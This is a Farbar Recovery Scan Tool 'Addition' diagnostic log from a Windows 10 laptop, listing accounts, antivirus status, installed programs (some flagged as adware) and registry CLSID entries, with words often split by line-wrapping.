Addition

(1)

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by REVERIEN (2016-04-06 15:16:27)

Running from C:\Users\REVERIEN\Desktop

Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29) Boot Mode: Normal

==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Di sabled)

DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disable d)

Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\ Users\Guest

HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enable d)

REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enable d) => C:\Users\REVERIEN

==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to un hide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21 .0.0.197 - Adobe Systems Incorporated)

Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE - Adobe Systems, Inc.)

Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Versio n: 9.4.0 - Adobe Systems Incorporated)

Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1 .7.157 - Adobe Systems, Inc.)

Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden

Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - ) Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43F F61CB7}) (Version: 4.1 - Apple Inc.)

Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE037 66}) (Version: 4.1 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Ver sion: 2.1.4.131 - Apple Inc.)

ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.30 35 - Environmental Systems Research Institute, Inc.)

ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research Institute, Inc.) Hidden

ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version: 10.1.2891 - Environmental Systems Research Institute, Inc.)

ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Rese arch Institute, Inc.) Hidden

(2)

8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Ap ple Inc.)

BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden

Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner 's Dictionary) (Version: - )

Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden

DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is 1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION

DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden

Dropbox (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Dropbox) (Version : 3.16.1 - Dropbox, Inc.)

Easy File Locker 1.5 (HKLM-x32\...\Easy File Locker) (Version: 1.5 - XOSLAB.COM) Empress of the Deep - The Darkest Secret (x32 Version: 2.2.0.98 - WildTangent) H idden

Everything 1.3.4.686 (x64) (HKLM\...\Everything) (Version: - )

Google Chrome (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Google Chro me) (Version: 49.0.2623.110 - Google Inc.)

Google Drive (HKLM-x32\...\{895D0391-459F-4D45-B8DD-13F0DE70C66E}) (Version: 1.2 8.1549.1322 - Google, Inc.)

Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1 .5.1557 - Google)

Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Versio n: 5.41.3.0 - Google)

Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden

GPL Ghostscript (HKLM\...\GPL Ghostscript 9.18) (Version: 9.18 - Artifex Softwar e Inc.)

HP Commercial Scanjet 5590 TWAIN Driver (HKLM-x32\...\HP Commercial Scanjet 5590 TWAIN Driver) (Version: - )

HP Imaging Device Functions 14.5 (HKLM\...\HP Imaging Device Functions) (Version : 14.5 - HP)

HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002. 006.003 - Hewlett-Packard)

hpg5590 (x32 Version: 140.000.000.000 - Hewlett-Packard) Hidden

HPScanjet5590Corporate11 (HKLM-x32\...\{16551913-D97B-4E8A-B751-44CBDC99CF5C}) ( Version: 2.20.0000 - HP)

IBM SPSS Statistics 20 (HKLM-x32\...\{2AF8017B-E503-408F-AACE-8A335452CAD2}) (Ve rsion: 20.0.0.0 - IBM Corp)

iFree Skype Recorder 6.0.15 (HKLM-x32\...\iFree Skype Recorder) (Version: 6.0.15 - iFree Skype Recorder)

Intel AppUp(R) center (HKLM-x32\...\Intel AppUp(R) center 41663) (Version: 3.8.0 .41663.61 - Intel)

Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E 4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA} ) (Version: 10.18.10.4276 - Intel Corporation)

Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4 A49FC}) (Version: 11.5.2.1001 - Intel Corporation)

Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)

Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - )

Island Tribe (x32 Version: 2.2.0.98 - WildTangent) Hidden

istartpageing (HKLM-x32\...\istartpageing) (Version: 1.0.0.6 - ) <==== ATTENTION Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Ver sion: 8.0.600.27 - Oracle Corporation)

(3)

8.0.600.27 - Oracle Corporation)

Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)

Jewel Quest Solitaire 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hi dden

Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{653C1B5A-3287-47B1-8613-07 45D4E771C4}) (Version: 15.0.0.463 - Kaspersky Lab)

Kaspersky Internet Security (x32 Version: 15.0.0.463 - Kaspersky Lab) Hidden KMSnano 24 (HKLM\...\KMSnano 24_is1) (Version: KMSnano 24 - )

Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EF-DBBC016C6CB2}) (Version: 2.0 - Microsoft)

Macromedia Dreamweaver 8 (HKLM-x32\...\{0837A661-FEC3-48B3-876C-91E7D32048A9}) ( Version: 8.0.0.2734 - Macromedia)

Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F }) (Version: 1.7.240 - Macromedia, Inc.)

Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden

Malware Protection Live (HKLM-x32\...\MalwareProtectionLive) (Version: - ) Mendeley Desktop 1.13.8 (HKLM-x32\...\Mendeley Desktop) (Version: 1.13.8 - Mende ley Ltd.)

Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2 007 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version : 15.0.4569.1506 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version : 5.1.41212.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473 D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student 2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version: - )

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf -51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE -38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C70 01-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporatio n)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D 76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporatio n)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F 6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25 302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F 1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corpor ation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9B E518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corpor ation)

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E 5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f 74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporatio n)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67 548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporatio n)

(4)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1 fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporatio n)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Micros oft Corporation)

MiKTeX 2.9 (HKLM\...\MiKTeX 2.9) (Version: 2.9 - MiKTeX.org)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 45.0.1 (x86 fr) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 fr)) ( Version: 45.0.1 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 4 5.0.1.5918 - Mozilla)

MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Vers ion: 4.30.2100.0 - Microsoft Corporation)

MySQL Connector C++ 1.1.6 (HKLM\...\{80EE5F65-5553-47A1-B6A9-8BF3211D21A3}) (Ver sion: 1.1.6 - Oracle and/or its affiliates)

MySQL Connector J (HKLM-x32\...\{8A9B23F6-9C1D-4DB2-8254-EAB70EF4325B}) (Version : 5.1.36 - Oracle Corporation)

MySQL Connector Net 6.9.7 (HKLM-x32\...\{2C148B86-FF80-49A7-BA18-E4CEF6464AE6}) (Version: 6.9.7 - Oracle)

MySQL Connector/C 6.1 (HKLM\...\{ABC3A516-54E3-414B-B501-762E7FB2F9D5}) (Version : 6.1.6 - Oracle Corporation)

MySQL Connector/ODBC 5.3 (HKLM\...\{A1991404-2634-47E1-BC45-8F3B5014B1D1}) (Vers ion: 5.3.4 - Oracle Corporation)

MySQL Documents 5.6 (HKLM-x32\...\{4D17B5C1-7388-4647-9A24-D5FDD173D4EA}) (Versi on: 5.6.27 - Oracle Corporation)

MySQL Examples and Samples 5.6 (HKLM-x32\...\{3E1DCC2B-8A78-4E91-B2EC-9DCFE25D41 FA}) (Version: 5.6.27 - Oracle Corporation)

MySQL For Excel 1.3.4 (HKLM-x32\...\{A0352E65-6E78-48B3-B6D6-B3208E663249}) (Ver sion: 1.3.4 - Oracle)

MySQL Installer - Community (HKLM-x32\...\{9A6E1C77-5B57-43C5-9B96-95ABDE40AE7F} ) (Version: 1.4.11.0 - Oracle Corporation)

MySQL Notifier 1.1.6 (HKLM-x32\...\{CB76A6E9-B184-461D-A8BE-7D0D73199545}) (Vers ion: 1.1.6 - Oracle)

MySQL Server 5.6 (HKLM\...\{861A680B-2084-444B-BE8D-89E153BEEEE3}) (Version: 5.6 .27 - Oracle Corporation)

Nero 8 (HKLM-x32\...\{9EDBB857-8028-49CD-B9C9-0B4D10CD1033}) (Version: 8.10.293 - Nero AG)

OCR Software by I.R.I.S. 14.5 (HKLM\...\HPOCR) (Version: 14.5 - HP)

Office Regenerator (HKLM-x32\...\{2E2E7A4E-9FA7-4E9D-A875-53B9F943F14E}) (Versio n: 20.11.0003 - Abstradrome)

Office Timeline (HKLM-x32\...\{08E5CEB9-36D2-4F52-9320-1DF41686A69A}) (Version: 3.6.0 - Office Timeline)

Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4569.1506 - Microsoft Corporation) Hidden

PCTeX version 6.1 (HKLM-x32\...\PCTeXv6_is1) (Version: - )

PDF Annotator 5.0.0.511 (HKLM-x32\...\PDFAnnotator_is1) (Version: 5.0.0.511 - GR AHL software design)

Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden

Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidd en

Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden

Premium Sound HD (HKLM\...\{000A208E-1050-4181-AC37-E13DA9254B73}) (Version: 1.1 2.6000 - DTS, Inc.)

Print to PDF Annotator (novaPDF OEM 7.7 printer) (HKLM\...\Print to PDF Annotato r_is1) (Version: 7.7.400 - Softland)

PrtScr 1.5 (HKLM-x32\...\PrtScr_is1) (Version: - FireStarter)

Quantum GIS Lisboa 1.8.0 Lisboa (HKLM-x32\...\Quantum GIS Lisboa) (Version: - Q GIS Development Team)

(5)

.80.95 - Apple Inc.)

RealDownloader (x32 Version: 18.1.3.103 - RealNetworks, Inc.) Hidden RealDownloader (x32 Version: 18.1.3.104 - RealNetworks) Hidden

RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetwork s, Inc) Hidden

RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden

RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetwor ks, Inc) Hidden

RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.3 - RealNet works)

REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (V ersion: 3.800.800.121813 - REALTEK Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEE D9A476}) (Version: 8.3.730.2012 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-9581 08FE7DBC}) (Version: 6.0.1.6794 - Realtek Semiconductor Corp.)

Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911} ) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)

Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Versi on: 2.00.0020 - REALTEK Semiconductor Corp.)

RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden

Reimage Protector (HKLM\...\Reimage Protector) (Version: - Reimage) <==== ATTEN TION

Scan (x32 Version: 14.0.1.0 - Hewlett-Packard) Hidden

Scanjet 5590 (HKLM\...\{A64EBD98-D9FB-4014-8658-F61C0EFFB87C}) (Version: 14.5 - HP)

Screencast-O-Matic v2.0 (HKLM-x32\...\Screencast-O-Matic v2.0) (Version: v2-1.8 - Screencast-O-Matic)

Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\.. .\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82 C1-A2F9403F2DA6}) (Version: - Microsoft)

Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Ver sion: 10.0.0 - McAfee)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Versi on: 8.0.0.9103 - Microsoft Corporation)

Skype™ 7.8 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.8.102 - Skype Technologies S.A.)

SR9USB (HKLM-x32\...\{DA387CD3-3524-43BF-B744-17C9FE27734D}) (Version: 1.00.1037 7.0 - SUPERAL Semiconductor, Inc.)

Stata 13 (HKLM-x32\...\{217BE429-022D-4094-960F-0376E1CBE13E}) (Version: 13.0 - StataCorp LP)

swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 Synaptics Incorporated)

Texmaker (HKLM-x32\...\Texmaker) (Version: - )

TeXstudio 2.9.4 (HKLM-x32\...\TeXstudio_is1) (Version: 2.9.4 - Benito van der Za nder)

TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Versio n: 1.00.08.6402 - Toshiba Corporation)

TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version: 2.0.0.6415 - Toshiba Corporation)

TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.00.6626.6410 - Toshiba Corporation)

TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.10 - TOSHIBA)

TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73 ECD4ACFAB5}) (Version: 2.00.973 - Toshiba Corporation)

TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Ver sion: 1.8.17.640104 - Toshiba Corporation)

(6)

TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15F DF}) (Version: 2.2.1.54043006 - Toshiba Corporation)

TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C 2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.2.00 - TOSHIBA Corporation)

TOSHIBA Service Station (HKLM\...\{B8C8422F-01F1-4791-B084-047AAFF9BFCC}) (Versi on: 2.4.4 - TOSHIBA)

TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Ver sion: 1.00.0015 - Toshiba Corporation)

TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (V ersion: 1.00.0002.32002 - Toshiba Corporation)

Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4 .3.3 - Toshiba Europe GmbH)

TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version: 5.1.0.21-A - Toshiba Corporation)

Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{901 50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{9F6B3627-AF9E-40A5-AAD5-349 7C4327616}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901 50000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F C94DD77E2}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901 50000-002A-0000-1000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F C94DD77E2}) (Version: - Microsoft)

Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901 50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F C94DD77E2}) (Version: - Microsoft)

Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden

VCRedistSetup (x32 Version: 1.0.0 - Nero AG) Hidden

Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden

Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hid den

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN) VSee (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\VSee) (Version: 15.0 .0.1018 - VSee Lab Inc)

WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden

WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version : 1.0.3.0 - WildTangent)

WildTangent Games App (Toshiba Games) (x32 Version: 4.0.9.7 - WildTangent) Hidde n

Windows Driver Package - Hewlett-Packard Image (12/27/2006 8.0.0.0) (HKLM\...\A 86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - Hewlett-Packard)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - M icrosoft Corporation)

Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC 9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

WinMend Folder Hidden 1.5.3 (HKLM-x32\...\WinMend Folder Hidden_is1) (Version: - WinMend.com)

WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.ra r GmbH)

XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)

YTD Video Downloader 5.1.0 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 5.1.0 - GreenTree Applications SRL) <==== ATTENTION

==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.)

(7)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{00 5A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\REVERIEN\AppData\R oaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{14 23F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.27.5\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{5C 8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71 DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\L ocal\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78 550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.13\psuser_64.dll => No File

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{79 3EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{82 0D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM. exe (Intel Corporation)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3 BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.26.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC 182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0 336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.25.11\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1 EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8 CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{EC D97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)

(8)

